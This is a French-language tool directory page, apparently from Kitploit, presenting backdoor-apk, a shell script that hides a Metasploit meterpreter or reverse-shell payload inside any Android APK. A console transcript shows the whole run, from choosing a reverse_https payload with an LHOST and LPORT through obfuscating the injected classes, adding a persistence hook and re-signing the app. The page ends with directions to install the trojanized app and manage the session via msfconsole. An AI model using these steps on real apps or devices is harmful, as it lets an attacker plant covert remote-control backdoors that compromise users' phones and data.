Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/dana-at-cp/backdoor-apk
Sécurité AndroidFrameworks d'ExploitationGénération de PayloadsTests d'IntrusionApprentissage et Éducation
GitHubdana-at-cp/backdoor-apk

backdoor-apk

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

2.4k71215il y a 7 ansVérifié par Kitploit

backdoor-apk est un script shell qui simplifie le processus d'ajout d'une porte dérobée à n'importe quel fichier APK Android. Les utilisateurs de ce script shell doivent avoir une connaissance pratique de Linux, Bash, Metasploit, Apktool, du SDK Android, de smali, etc. Ce script shell est fourni tel quel, sans garantie d'aucune sorte, et est destiné uniquement à des fins éducatives.

Partager

backdoor-apk

backdoor-apk est un script shell qui simplifie le processus d'ajout d'une backdoor à n'importe quel fichier APK Android. Les utilisateurs de ce script shell doivent avoir une connaissance pratique de Linux, Bash, Metasploit, Apktool, le SDK Android, smali, etc. Ce script shell est fourni tel quel, sans aucune garantie, et est destiné uniquement à des fins éducatives.

Utilisation :

root@kitploit:~
root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Lancement de backdoor-apk.sh v0.2.4a le Fri Sep 28 17:13:37 EDT 2018
[+] Options de payload Android :
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Veuillez sélectionner une option de payload Android : 2
[?] Veuillez entrer une valeur LHOST : 10.6.9.31
[?] Veuillez entrer une valeur LPORT : 443
[+] Options de permission du manifeste Android :
1) Conserver l'original
2) Fusionner avec le payload et mélanger
[?] Veuillez sélectionner une option de permission du manifeste Android : 2
[+] Gérer le payload via un script de ressources : msfconsole -r backdoor-apk.rc
[*] Décompilation du fichier APK original...fait.
[*] Localisation du fichier smali à accrocher dans le projet original...fait.
[+] Paquet où les fichiers smali RAT seront injectés : com/baidu/browser/inter
[+] Fichier smali pour accrocher le payload RAT : com/baidu/browser/inter/BdApplication.smali
[*] Génération du fichier APK RAT...fait.
[*] Décompilation du fichier APK RAT...fait.
[*] Fusion des permissions des projets original et payload...fait.
[*] Injection des classes Java utiles dans le fichier APK RAT...fait.
[*] Création d'un nouveau répertoire dans le paquet original pour les fichiers smali RAT...fait.
[+] Chemin d'injection du paquet : com/baidu/browser/inter/pjese
[+] Nouveau nom de classe smali généré pour MainBroadcastReceiver.smali : Iivym
[+] Nouveau nom de classe smali généré pour MainService.smali : Aupyx
[+] Nouveau nom de classe smali généré pour Payload.smali : Nwiuc
[+] Nouveau nom de classe smali généré pour StringObfuscator.smali : Abnrw
[+] Nouveau nom de méthode smali généré pour la méthode StringObfuscator.obfuscate : icobf
[+] Nouveau nom de méthode smali généré pour la méthode StringObfuscator.unobfuscate : wbcik
[*] Copie des fichiers smali RAT vers les nouveaux répertoires dans le projet original...fait.
[*] Correction des fichiers smali RAT...fait.
[*] Obfuscation des valeurs const-string dans les fichiers smali RAT...fait.
[*] Ajout du crochet dans le fichier smali original...fait.
[*] Ajout du crochet de persistance dans le projet original...fait.
[*] Recompilation du projet original avec la backdoor...fait.
[*] Génération de la clé RSA pour la signature...fait.
[*] Signature de l'APK recompilé...fait.
[*] Vérification des artefacts signés...fait.
[*] Alignement de l'APK recompilé...fait.
root@kali:~/Code/github/backdoor-apk/backdoor-apk#

L'APK recompilé sera trouvé dans le répertoire 'original/dist'. Installez l'APK sur un appareil Android compatible, exécutez-le, et gérez la connexion meterpreter via le script de ressources généré : msfconsole -r backdoor-apk.rc

Télécharger l’outil